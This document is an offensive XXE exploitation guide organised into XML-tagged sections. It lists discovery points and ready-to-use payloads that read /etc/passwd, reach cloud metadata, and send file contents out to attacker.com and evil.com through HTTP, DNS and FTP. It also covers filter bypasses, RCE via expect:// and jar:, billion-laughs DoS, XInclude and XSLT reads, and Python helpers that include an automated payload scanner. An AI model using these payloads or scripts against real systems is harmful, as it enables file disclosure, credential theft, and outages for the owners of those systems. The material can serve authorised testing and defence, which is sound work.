<xxe_vulnerability_guide>
<title>XML EXTERNAL ENTITY (XXE) - ADVANCED EXPLOITATION</title>

<critical>XXE can lead to file disclosure, SSRF, DoS, and in some parser configurations RCE. It is often found in APIs, file uploads, and document parsers.</critical>

<discovery_points>
- XML file uploads (docx, xlsx, svg, xml)
- SOAP endpoints
- REST APIs accepting XML
- SAML implementations
- RSS/Atom feeds
- XML configuration files
- WebDAV
- Office document processors
- SVG image uploads
- PDF generators with XML input
</discovery_points>

<basic_payloads>
<file_disclosure>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
</file_disclosure>

<ssrf_via_xxe>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>
</ssrf_via_xxe>

<blind_xxe_oob>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>

evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
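
The `&#x25;` in evil.dtd matters: a literal `%` inside the entity value would be read as a parameter-entity reference when `eval` is declared, so the nested declaration encodes it as a character reference instead. A minimal sketch that renders the same DTD for a given target and callback; the function name `build_oob_dtd` and its parameters are hypothetical, not part of any tool:

```python
def build_oob_dtd(target_uri: str, callback_base: str) -> str:
    """Render the external DTD used for out-of-band exfiltration.

    target_uri    -- resource the parser should read (e.g. a file: URI)
    callback_base -- listener URL that receives the data in the ?x= parameter
    """
    return (
        f'<!ENTITY % file SYSTEM "{target_uri}">\n'
        # &#x25; is an encoded '%', so "exfiltrate" is only declared
        # once %eval; is expanded.
        f'<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '
        f"'{callback_base}?x=%file;'>\">\n"
        "%eval;\n"
        "%exfiltrate;\n"
    )


print(build_oob_dtd("file:///etc/passwd", "http://attacker.com/"))
```

Multi-line files often break the callback URL, which is why single-line targets or an encoding wrapper tend to be tried first.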
</blind_xxe_oob>
</basic_payloads>

<advanced_techniques>
<parameter_entities>
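Parameter-entity references inside a declaration are rejected in the internal subset, so these declarations must be served from an external DTD:
<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://evil.com/ext.dtd"> %ext;]>

ext.dtd:
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?d=%data;'>">
%param;
%exfil;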
</parameter_entities>

<error_based_xxe>
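<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.com/error.dtd"> %ext;]>

error.dtd (external, because the internal subset rejects %file; inside a declaration):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;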
</error_based_xxe>

<xxe_in_attributes>
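The XML spec forbids direct references to external entities in attribute values, so conformant parsers reject attr="&xxe;" for a SYSTEM entity. Wrap the file contents in an internal entity declared from an external DTD instead:
<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.com/attr.dtd"> %ext;]>
<root attr="&wrapped;"/>

attr.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY wrapped '%file;'>">
%eval;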
</xxe_in_attributes>
</advanced_techniques>

<filter_bypasses>
<encoding_tricks>
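- UTF-16: <?xml version="1.0" encoding="UTF-16"?> (re-encode the entire body as UTF-16, not just the declaration)
- UTF-7: <?xml version="1.0" encoding="UTF-7"?> (only parsers that still support UTF-7)
- Base64 in CDATA: <![CDATA[base64_payload]]> (only helps when the application base64-decodes the value before parsing it)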
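
A minimal sketch of why the UTF-16 variant can slip past byte-level filters, assuming a hypothetical filter that searches the raw request body for the ASCII bytes `<!DOCTYPE`. The names `naive_filter_blocks` and `encode_document` are illustrative only:

```python
TEMPLATE = (
    '<?xml version="1.0" encoding="{enc}"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<root>&xxe;</root>"
)


def naive_filter_blocks(body: bytes) -> bool:
    """Hypothetical filter: block any body containing ASCII '<!DOCTYPE'."""
    return b"<!DOCTYPE" in body


def encode_document(enc: str) -> bytes:
    """Declare and apply the same encoding so the parser can decode the body."""
    return TEMPLATE.format(enc=enc).encode(enc)


utf8_body = encode_document("UTF-8")
# Python's "UTF-16" codec prepends a byte-order mark; each ASCII character
# becomes two bytes, so the ASCII needle no longer appears contiguously.
utf16_body = encode_document("UTF-16")

print(naive_filter_blocks(utf8_body))   # True
print(naive_filter_blocks(utf16_body))  # False
```

Whether the target parser accepts the re-encoded body still has to be confirmed per endpoint.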
</encoding_tricks>

<protocol_variations>
- file:// → file:
- file:// → netdoc: (older Java runtimes only)
- http:// → https://
- Gopher: gopher:// (older Java runtimes and some non-Java URL fetchers)
- PHP wrappers: php://filter/convert.base64-encode/resource=/etc/passwd
</protocol_variations>

<doctype_variations>
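Case variants (XML keywords are case-sensitive, so these only pass lenient or HTML-style parsers):
<!doctype foo [
<!DoCtYpE foo [
External DTD via PUBLIC or SYSTEM identifier:
<!DOCTYPE foo PUBLIC "Any" "http://evil.com/evil.dtd">
<!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">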
</doctype_variations>
</filter_bypasses>

<specific_contexts>
<json_xxe>
{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
</json_xxe>

<soap_xxe>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo>&xxe;</foo>
  </soap:Body>
</soap:Envelope>
</soap_xxe>

<svg_xxe>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>
</svg_xxe>

<docx_xlsx_xxe>
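1. Unzip the document (docx and xlsx files are ZIP archives)
2. Edit an XML part such as word/document.xml (docx), xl/workbook.xml (xlsx), or [Content_Types].xml
3. Add the DOCTYPE with the entity declaration before the root element and reference the entity in the body
4. Rezip with the same internal paths and upload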
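
The unzip, edit, rezip steps can be sketched with the standard library. This is a minimal illustration that swaps one part of an archive in memory; `repack_with_part` is a hypothetical helper name, and the caller supplies the replacement XML:

```python
import io
import zipfile


def repack_with_part(src_bytes: bytes, part_name: str, new_xml: bytes) -> bytes:
    """Return a copy of a ZIP-based document with one part replaced.

    All other entries keep their names and order so the container
    still opens as the same document type.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(src_bytes)) as src:
        if part_name not in src.namelist():
            raise KeyError(f"{part_name} not found in archive")
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
            for name in src.namelist():
                data = new_xml if name == part_name else src.read(name)
                dst.writestr(name, data)
    return out.getvalue()
```

Usage would look like `repack_with_part(open("in.docx", "rb").read(), "word/document.xml", modified_xml)`, where `in.docx` and `modified_xml` are placeholders.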
</docx_xlsx_xxe>
</specific_contexts>

<blind_xxe_techniques>
<dns_exfiltration>
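<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.com/dns.dtd"> %ext;]>

dns.dtd (external, because the internal subset rejects %data; inside a declaration):
<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.attacker.com/'>">
%param;
%exfil;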
</dns_exfiltration>

<ftp_exfiltration>
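<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.com/ftp.dtd"> %ext;]>

ftp.dtd (external, because the internal subset rejects %data; inside a declaration):
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'ftp://attacker.com:2121/%data;'>">
%param;
%exfil;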
</ftp_exfiltration>

<php_wrappers>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
</php_wrappers>
</blind_xxe_techniques>

<xxe_to_rce>
<expect_module>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
</expect_module>

<file_upload_lfi>
1. Upload malicious PHP via XXE
2. Include via LFI or direct access
</file_upload_lfi>

<java_specific>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/evil.class">]>
</java_specific>
</xxe_to_rce>

<denial_of_service>
<billion_laughs>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>
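
The amplification is simple arithmetic: each level multiplies the previous one by the fanout. A minimal sketch, assuming a hypothetical helper `expanded_length`, shows that the five-level document above is small, while the classic ten-level, fanout-10 form reaches billions of characters:

```python
import xml.etree.ElementTree as ET


def expanded_length(base: str, fanout: int, levels: int) -> int:
    """Characters produced by the top entity after full expansion.

    `levels` counts every entity in the chain, including the base one
    (lol ... lol5 is 5 levels).
    """
    return len(base) * fanout ** (levels - 1)


# The five-level, fanout-5 document shown above.
SAMPLE = """<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>"""

print(expanded_length("lol", 5, 5))      # 1875
print(len(ET.fromstring(SAMPLE).text))   # parser agrees with the formula
print(expanded_length("lol", 10, 10))    # 3000000000
```

Only the small sample is actually parsed here; the larger figure is computed, not expanded.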
</billion_laughs>

<external_dtd_dos>
<!DOCTYPE foo SYSTEM "http://slow-server.com/huge.dtd">
</external_dtd_dos>
</denial_of_service>

<modern_bypasses>
<xinclude>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</root>
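
XInclude needs no DOCTYPE at all, which is why it survives DTD blocking. A minimal local sketch using Python's `xml.etree.ElementInclude`, whose default loader opens `href` as a filesystem path rather than a file:// URL; the temp file and the `resolve_xincludes` helper are stand-ins for illustration, and server-side processors may behave differently:

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def resolve_xincludes(xml_text: str) -> ET.Element:
    """Parse a document and expand its xi:include elements in place."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root)  # default loader reads href from disk
    return root


# Stand-in for a sensitive file on the processing host.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("demo-secret")

doc = (
    '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
    f'<xi:include parse="text" href="{fh.name}"/>'
    "</root>"
)
try:
    root = resolve_xincludes(doc)
finally:
    os.unlink(fh.name)

print(root.text)  # file contents, pulled in without any DTD
```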
</xinclude>

<xslt>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('file:///etc/passwd')"/>
  </xsl:template>
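</xsl:stylesheet>
Note: document() only loads well-formed XML, so target an XML file with it; on XSLT 2.0+ processors, unparsed-text('file:///etc/passwd') reads plain text.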
</xslt>
</modern_bypasses>

<parser_specific>
<java>
- Supports the jar: protocol
- Most JAXP parsers load external DTDs and entities unless features such as disallow-doctype-decl are set
- Parameter entities work
</java>

<dotnet>
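- Supports file:// when an XmlResolver is active
- DTD processing varies by version: XmlReader prohibits DTDs by default since .NET Framework 4.0; XmlDocument and XmlTextReader are safe by default only from 4.5.2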
</dotnet>

<php>
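- libxml2 based; since libxml2 2.9.0, external entities are substituted only when the code passes LIBXML_NOENT
- expect:// protocol requires the expect extension
- php:// wrappers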
</php>

<python>
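- Standard-library parsers (xml.etree, xml.dom.minidom, xml.sax) do not resolve external entities on current Python 3 releases; entity-expansion DoS depends on the bundled Expat version
- lxml resolves entities by default in releases before 5.0 (resolve_entities=True), so it is usually the more exposed parser, not the safer one; network fetches stay blocked unless no_network=False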
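
A minimal probe of the standard-library behaviour, assuming a throwaway temp file as the target. Per the Python documentation, `xml.etree.ElementTree` raises a ParseError instead of expanding an external entity; `probe_external_entity` is a hypothetical helper name:

```python
import os
import tempfile
from pathlib import Path
import xml.etree.ElementTree as ET


def probe_external_entity(path: str) -> str:
    """Reference `path` through a SYSTEM entity and report what comes back."""
    uri = Path(path).as_uri()
    doc = f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]><foo>&xxe;</foo>'
    try:
        return ET.fromstring(doc).text or ""
    except ET.ParseError as exc:
        return f"rejected: {exc}"


# Stand-in for a sensitive file.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("demo-secret")
try:
    result = probe_external_entity(fh.name)
finally:
    os.unlink(fh.name)

print(result)  # a "rejected: ..." message rather than the file contents
```

Running the same document through another parser on the target stack is a quick way to compare defaults.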
</python>
</parser_specific>

<validation_testing>
<detection>
1. Basic entity test: &xxe;
2. External DTD: http://attacker.com/test.dtd
3. Parameter entity: %xxe;
4. Time-based: DTD with slow server
5. DNS lookup: http://test.attacker.com/
</detection>

<false_positives>
- Entity declared but not processed
- DTD loaded but entities blocked
- Output encoding preventing exploitation
- Limited file access (chroot/sandbox)
</false_positives>
</validation_testing>

<impact_demonstration>
1. Read sensitive files (/etc/passwd, web.config)
2. Cloud metadata access (AWS keys)
3. Internal network scanning (SSRF)
4. Data exfiltration proof
5. DoS demonstration
6. RCE if possible
</impact_demonstration>

<automation>
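# XXE scanner sketch: posts each payload and checks for in-band or out-of-band evidence
import requests

def check_callback():
    # Placeholder: return True if your out-of-band listener logged a hit
    return False

def test_xxe(url, param):
    payloads = [
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/"> %xxe;]><foo/>',
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
    ]

    for payload in payloads:
        # A timeout keeps one hanging endpoint from stalling the scan
        response = requests.post(url, data={param: payload}, timeout=10)
        if 'root:' in response.text or check_callback():
            return f"XXE found with: {payload}"
    return None  # no payload produced evidence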

<pro_tips>
1. Try all protocols, not just file://
2. Use parameter entities for blind XXE
3. Chain with SSRF for cloud metadata
4. Test different encodings (UTF-16)
5. Don't forget JSON/SOAP contexts
6. XInclude when entities are blocked
7. Error messages reveal file paths
8. Monitor DNS for blind confirmation
9. Some parsers allow network access but not files
10. Modern frameworks disable XXE by default - check configs
</pro_tips>

<remember>XXE is about understanding parser behavior. Different parsers have different features and restrictions. Always test comprehensively and demonstrate maximum impact.</remember>
</xxe_vulnerability_guide>
